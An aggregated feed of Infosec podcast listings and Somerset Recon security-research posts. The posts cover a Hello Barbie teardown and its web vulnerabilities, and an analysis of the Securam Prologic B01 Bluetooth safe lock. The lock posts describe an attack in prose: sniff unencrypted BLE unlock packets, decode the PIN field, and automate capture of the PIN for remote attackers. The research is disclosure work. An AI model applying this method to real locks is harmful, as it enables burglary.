0:00 - Intro 
0:31 - What is a security architect? 
1:07 - How to become a security architect
2:15 - What certifications should a security architect get? 
3:07 - Skills a security architect needs
4:07 - Learning as a security architect
7:06 - Security architect tools
7:58 - Where do security architects work 
9:28 - Private vs federal security architects
11:09 - Related roles to security architect
12:12 - Start working toward security architect
13:23 - Outro

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at


Three foundational cybersecurity certifications | Guest Mike Meyers

By: Infosec
28 February 2022 at 08:00

Infosec Skills author Mike Meyers of Total Seminars joins me to discuss three foundational certifications that will start you on just about any path you want to go. Specifically, the CompTIA A+, Network+ and Security+ certifications. Meyers dispenses tough love for people who want someone else to map their career for them, talks up the benefits of vendor-neutral certs and blows my mind by comparing certs with car windshield wipers. Intrigued? You should be! That’s all today, on Cyber Work!

– Start learning cybersecurity for free:
– View Cyber Work Podcast transcripts and additional episodes:

0:00 - Intro 
3:00 - Beginning in cybersecurity 
3:23 - Why teach cybersecurity? 
5:54 - Why CompTIA?
6:57 - Start vendor neutral with cybersecurity certification 
12:10 - Being diverse in cybersecurity is essential 
13:35 - Why A+, Network+ and Security+?
25:53 - Guiding your cybersecurity career
30:05 - Where to learn cybersecurity skills
42:02 - Cybersecurity job dilution 
44:20 -  Where do I begin my cybersecurity career?
48:32 - Using the Infosec Skills platform
49:38 - Mike Meyers' next projects
51:30 - What is Total Seminars?
52:12 - Learn more about Meyers and Total Seminars
53:23 - Outro

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at


Hello Barbie Security: Part 1 - Teardown

20 November 2015 at 23:25

Mattel, with the help of San Francisco startup ToyTalk, recently released an Internet of Things (IoT) enabled Barbie doll that children can talk to, responding with over “8,000 lines of recorded content." To produce all of this content it relies on a constant connection to the internet.

Utilizing a user’s home Wi-Fi network, it sends audio recordings to ToyTalk’s servers for analysis and to generate a response. Every audio clip is stored in the cloud where parents can later review and share them online. This data being mined and used for marketing purposes is a big privacy concern, but so is the possibility of this data or the device itself being susceptible to hackers. However, Mattel assures users that they are “committed to safety and security”and that the doll “conforms to applicable government standards”. The release of the doll has already stirred up some controversy on the internet, but until now it has all been speculation.

As security researchers we thought it prudent to explore whether or not Mattel was able to achieve the level of privacy and security that they claim. If they did, then how? And if not, what implications are there for future devices? The first step was to disassemble the doll and identify the chips that might allow us to analyze the doll’s firmware.

Hello Barbie main circuit board. Front side. Showing Wi-Fi module, flash memory, audio codec, and debugging headers.

Hello Barbie main circuit board. Back side. Showing LEDs, test points, and main button.

Looking at the main circuit board, we identified a number of significant chips, modules, and signal connections.

At the far left of the topside of the board is the AzureWave AW-CU300E 802.11 b/g/n WiFi Microcontroller Module (M1), which builds upon the Marvell 88MW300. In a press release, Marvell pointed out that this module ”provides both the Wi-Fi connection as well as the microcontroller to run Hello Barbie firmware.” This means that the mainboard is composed of a Wi-Fi MCU System-on-Chip (SoC) where everything else connected to it is a peripheral. This is interesting because Marvell is essentially providing IoT board designers a simple Internet-ready drop-in module for all their devices. We can imagine lots of IoT devices being designed using these sorts of ready-made network computer modules in the future.

The Nuvoton NAU8810 24-bit audio codec (U1), is located on the lower-middle half of the board. It provides ADC, DAC, gain, and input/output mixers for both the doll’s microphone and speaker. It also has an I2C bus connector (J7) near the bottom-right corner.

The chip to the left of the AW-CU300E is a Gigadevice GD25Q16 16Mbit SPI Flash (U2), and is the system’s main non-volatile memory. This is where the doll's firmware and resource files are stored.

The other chips populating the board are most likely power related (battery charger, voltage regulator, etc.), as well as what looks like a JTAG connector (J110).

We immediately focused our attention on the flash memory chip...

Screenshot of firmware being dumped from Barbie's flash memory.

We began dumping the contents of the 16Mbit flash chip, and some pretty neat stuff popped up. Stay tuned for Part Two, where we’ll dive into the architecture of the system and its security implications.

Follow us on Twitter @SomersetRecon to catch our next posts in the series.

Hello Barbie Security: Part 2 - Analysis

25 January 2016 at 19:01


In our previous post we showed a teardown of the Hello Barbie. In this post we will discuss its overall architecture, the security vulnerabilities found, and what we took away from these results. Initially it appeared that ToyTalk had put some consideration into their security model, by building upon existing hardware and attempting to adhere to the minimal KidSafe Seal Program  information security requirements. Additionally, they encrypted nearly all communication between devices and chose to keep sensitive information in the cloud, rather than on the doll. However, what they failed to do was properly harden their web services. In the vulnerabilities that we found, most existed in either ToyTalk’s websites or web services. This leads us to believe that ToyTalk performed little to no pre-production security analysis and is using their bug bounty program as a low-cost alternative. This is supported by our observations that ToyTalk was actively patching and even discarding entire websites as we were performing analysis and how many of the same vulnerabilities were discovered by other groups on HackerOne. If this is the case, then it was a short-sighted cost-cutting decision with repercussions that could have been prevented by simply hiring independent security team to audit their product. Their actions left customers’ personal information vulnerable in a race between security researchers and malicious hackers to see who could find those vulnerabilities first. Companies need to understand that a bug bounty program is a last resort, not a replacement for proper security analysis before a product’s release.

Vulnerabilities Found

During our investigation we analyzed the memory dump, reverse engineered the firmware and Android application, observed network traffic, and analyzed the security of ToyTalk’s web applications and services.

Through these methods we were able to intercept encrypted communication from the mobile application, trick the mobile application and web application into leaking data, and communicate with ToyTalk servers, masquerading as either Barbie or the mobile application. Minor security weaknesses were found in the device, while larger and more impactful vulnerabilities were found in ToyTalk’s web applications and web services.

The nastiest vulnerability allows an attacker to enumerate account usernames and brute force their passwords with unlimited retries, without triggering any form of account lockout. There was also a weak password policy in place making this an even more viable attack vector.

Additional vulnerabilities include the ToyTalk website issuing password reset requests over HTTP that do not expire, pages vulnerable to Stored Cross-Site Scripting (XSS) and session cookies that did not expire. Throughout the analysis, 14 vulnerabilities were discovered. Further details on our security analysis and the vulnerabilities can be found in our full write up.

System Architecture

Some may remember the articles about the My Friend Cayla doll hack that could force it to say curse words and other colorful things. This was made possible due to poor design decisions. That doll was a simple device acting as a Bluetooth headset that could pair with any mobile device without authentication. It relied heavily upon the mobile application, which acted as the core of the product, handling all querying of questions and responses. What researchers tried to illustrate was that if a Cayla doll could accidentally lose connection and pair with an attacker’s device that the attacker could listen to what the doll records and control what it says.  

This is not the same case with Hello Barbie. Barbie is built upon hardware specifically designed for IoT, and its architecture is comparable to that of other IoT services like Amazon AWS IoT. The system has three possible clients that interface with each other and the cloud. The doll uses WiFi, in-place of Bluetooth. Pairing with the mobile application is much more involved and is only used to associate Barbie with a WiFi access point and ToyTalk account. After that, Barbie mainly communicates with ToyTalk servers, doing all of its storage and data-processing in the cloud. Staging a man-in-the-middle attack on any of the devices are difficult as it requires an attacker to have access to a trusted network. Even then, communication between the devices and the cloud are being encrypted.

Attack Model

The resulting threat model leaves home WiFi credentials and audio recordings as the data that would be attractive to attackers. However, accessing this information is not easy. Network SSIDs and passwords are stored on the doll, but the passwords are encrypted in doll’s memory and are difficult to extract. Accessing audio recordings could be achieved by eavesdropping on a Barbie’s conversation or a data breach of the ToyTalk’s website. However, eavesdropping would require an attacker to generate a valid certificate, which is not easy. ToyTalk’s website is a different story, and its security rests on community participation in their bug bounty program.

Info for Consumers

What does this mean for consumers interested in this product? It means that ToyTalk requests basic information about their users, voice recordings are stored in the cloud, and for the most part this isn’t much different from using other cloud services. The actual doll and mobile device do not store or share much interesting information. What consumers need to decide is whether they are willing to trust their children’s content with ToyTalk.

Info for IoT Companies, Engineers, and Developers

What does this mean for creators and tinkerers of IoT? IoT products are a combination of multiple, potentially complex, devices that connect and form a network architecture. Designing all these devices, protocols, and services for a product can be challenging and prone to error. By leveraging pre-existing IoT hardware modules and services, one can minimize the amount of custom work that needs to be done to a product, thus minimizing the attack surface. In Hello Barbie’s overall design, its weakest pieces were ToyTalk’s web services that they implemented, but the IoT hardware itself presents few opportunities for an attacker.


In the end, we believe that ToyTalk started off well by utilizing pre-designed hardware and software, but fell short when it came to their web security. The number of vulnerabilities found in both ToyTalk’s websites and web services, and in such a short amount of time, indicate that they had little to no pre-production security analysis and are relying on their bug bounty program to patch up the holes. However, this could have been easily remedied by hiring a professional security team to audit the attack surface that is left. It also seems that the KidSafe Seal Program does not provide strict or clear enough information security requirements for web related technologies. In the end, it’s a decision for the parents about the trust they place in ToyTalk. If ToyTalk’s servers are ever eventually breached, they wouldn’t be the first company to leak personal information about children to hackers. It’s up to the parents to decide whether they want to take that risk.

Follow us on twitter @SomersetRecon to catch our next posts!


Electronic Safe Lock Analysis: Part 1 - Teardown

8 June 2016 at 16:33


With the rise of IoT devices and the age of convenience, electronic locks are becoming more commonplace on safes, homes, businesses, and even handheld padlocks. While classic mechanical locks have gone through decades of rigorous testing, their electronic counterparts are still considered unfamiliar territory.  Securam, founded in 2006, has designed locks for personal use, commercial, corporate, ATM, and bank security containers. Many of their products are Underwriters Laboratories (UL) certified at the highest level of security (UL Type-1). These locks can include features such as biometric scanning, WIFI, Bluetooth low energy, and mobile application interoperability. While adding convenience, these features do not necessarily harden the security of their product line. With this in mind, we decide to analyze several Securam devices to see how they worked and if the devices had any potential security vulnerabilities.

How It Works

The following teardown was performed on the Securam ProLogic 0601A-B01 entry pad and Securam EL-0701 lock body. The entry pad allows a user to enter a 6-digit pin number. When correct, the entry pad sends an electrical signal to the lock body, which is positioned on the inside of the safe. The lock body will then retract the bolt allowing the container to be opened. The entry pad also supports bluetooth communication, and the device can be controlled using an iOS or Android application.


Front side of the entry pad circuit board shows power connections for a 9V battery and a 10-pin debugging interface (J1).

Back side of the entry pad is where the board’s main MCU, a Renesas μPD78F0515A (U1), can be found. It’s accompanied with an NXP QN902X SoC (U6) for BLE communication. Peripherals, such as the 8-pin keypad header (P1) and 4-pin serial interface (P3; ref above) to the lock-body are also located on this side. This serial interface is both used for communication and to carry power to the lock body. There are unpopulated footprints (U2, U4, BAT1), which may have been used in previous revisions of this board, for debugging purposes, or other models of this entry pad.

Front side of the lock body circuit board uses a less featureful Renesas μPD78F9234 MCU (U1). It is only known to communicate with a entry pad over the wired 4-pin serial communication interface (JP1), but there is another serial interface (JP2) adjacent to it that is hidden by the lock body cover. Additionally hidden is a 2-pin connector (P1) that is tied to pin 14 on the MCU. Its purpose is still undetermined.

Back side of the lock body reveals another 8-pin debugging interface (J1; under sticker) and the hardware reset button (SW1). The reset button allows the lock body and entry pad to “relink” if the devices were to somehow fall out of sync with each other. The reset button is also used when connecting a preconfigured lock body with a new entry pad.

The lock body is the only mechanical part of the system. It is composed of a DC motor and bolt. If 5 volts is applied across the red and yellow wires shown, the DC motor will retract the bolt and allow the security container to be opened.


By inspecting the lock body and the keypad, we were able to gain more insight into how the device operates. This additional information gave us clues into its security and potential vulnerabilities. In part two of our blog posts we'll cover a more in depth security analysis of the devices and some vulnerabilities we discovered. Follow us on Twitter @SomersetRecon to catch our next posts in the series.

Electronic Safe Lock Analysis: Part 2

12 December 2016 at 17:25

Introduction / Recap

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In a previous post we talked about the SecuRam Prologic B01, a Bluetooth Low Energy (BLE) electronic lock marketed towards commercial applications. After performing an initial tear-down, we were able to map out the device’s behaviors and attack surface. We then narrowed our efforts on analyzing the device’s BLE wireless communication. The Prologic B01’s main feature is that it can be unlocked by a mobile Android or iOS device over BLE. The end result was a fully-automated attack that allows us to remotely compromise any Prologic B01 lock up to 100 yards away. We have contacted SecuRam about this vulnerability, but since these devices are not capable of OTA (Over-the-Air) firmware updates, it does not look promising that they will be patched. Because of this, we advise all current/prospective customers to avoid this entry pad.

Vulnerabilities Found

The mobile application used to control the Prologic B01 remotely had no anti-reversing protection on the Android version. This allowed us to decompile and conveniently audit the mobile application’s code, which lead us to find vulnerabilities within the communication protocol. BLE data between a mobile device and the Prologic B01 lacked encryption, allowing us to sniff traffic in plaintext as it was transmitted. The Prologic B01 also does not possess a secure channel to pair with a mobile device, meaning that any mobile device with the “SecuRam Access” application installed can communicate with any ProLogic B01. The lack of encryption and proper key management allows for a fully-automated remote attack.

Attack Model

Because the Prologic B01 has a unique advertising signature, safes can easily be discovered using commodity Bluetooth devices or software defined radios. These characteristics would allow an attacker to wardrive for devices. In other words, this would allow an attacker to drive around and map out the location of safes in a region.

Figure 1: Wireshark capturing Bluetooth traffic with wardriving filter

Since BLE traffic is sent over plaintext, command packets can be decoded. The packet, shown in Figure 2, was a captured unlock command. The last four bytes of the receiver’s (pink) and sender’s (cyan) MAC address is included. The PIN (green) is parsed as a Long type and is sent in reverse order, which is illustrated above. Finally, the open time (blue) is included and specifies how long the lock should stay open, in seconds.

Figure 2: Bluetooth application payload containing the receiver MAC address (pink), sender MAC address (cyan), PIN (green), and open time (blue)

Figure 3: PIN in hexadecimal format

Automating this process is what makes this attack powerful. An attacker can drop BLE scanning devices in nearby areas where Prologic B01 safes were detected. The devices can continuously scan for unknowing victims to connect to their safe with their mobile devices. The BLE traffic is immediately captured, decoded, and the unlock PIN is sent back to the attacker who is located in a safe location.

In our attack, we used a Texas Instruments CC2540 and BLE Sniffer software to capture the BLE traffic of a specific target. The data is then funneled into a Python service that filters on the unlock command packet and extracts the PIN.

Info for Customers

The standards for wireless electronic locks are vague and few, making it difficult for consumers to tell whether they can trust a product or not. While the Prologic B01’s datasheet did not explicitly detail its wireless security features, the omission of that information is a perfect example of why consumers are confused, especially for a device assumed to be secure enough to protect a safe. The best measure for consumers is to avoid wireless electronic locks. Until there are verified security standards put in place, there are just too many unknown variables to take in account.

Info for IoT Companies, Engineers, and Developers

If you’re developing a wireless electronic lock, it is worth the investment to incorporate security features. The Prologic B01’s biggest downfall was that it did not encrypt any of its wireless traffic. Strong encryption schemes exist and would prevent an attacker from sniffing traffic and deriving the plaintext data. This could be implemented utilizing pre-shared keys at the link-level or application-level. Strong encryption, cryptographic integrity, authentication, and strong key management are all effective methods that prevent attacks and they should be implemented to enhance the security of wireless electronic locks.

Conclusion / Takeaways

Wireless electronic locks are entering the forefront of the physical security marketplace. The industry has recently been pushing on creating wireless electronic locks. As a new concept, there has been little to no regulation or standardization, causing the security of these devices to suffer. This has been the case for many residential-grade locks for a while now. However, our findings show that commercial-grade locks also suffer from the same vulnerabilities.
